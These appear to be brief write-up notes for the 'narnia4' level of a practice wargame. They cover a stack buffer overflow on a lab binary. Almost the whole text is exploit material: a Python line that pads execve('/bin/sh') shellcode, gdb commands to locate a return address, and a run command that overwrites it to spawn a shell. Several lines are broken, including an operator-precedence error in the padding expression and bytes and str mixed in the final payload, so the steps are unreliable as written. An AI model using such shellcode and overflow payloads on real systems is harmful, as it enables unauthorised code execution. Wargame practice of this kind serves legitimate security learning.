- Create super_shellcode (garbage + shellcode)
super_shellcode = b'G'*len(buffer)-len(shellcode) + b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'
- Find ret addr:
	gdb -q ./narnia4

	# Rewrite ret addr
	run $(python -c "print(super_shellcode + b'A'*4)")

	# Check ret addr
	x/300x $esp
	...
	0xffffd820: 0x41414141    0x41414141    0x41414141    0x41414141
	0xffffd830: ...
	0xffffd840: ...
	0xffffd850: ...
	0xffffd860: ...
	0xffffd870: ...
	...

	# We have 6 addresses (0xffffd820, 0xffffd830, 0xffffd840, 0xffffd850, 0xffffd860, 0xffffd870)
	# Add any address with my payload
	run $(python -c "print(super_shellcode + '\xff\xff\xd8\x20'[-1::-1])")
	
	# And I got shell !!!
	# !!! THIS IS EASY SHELL !!!
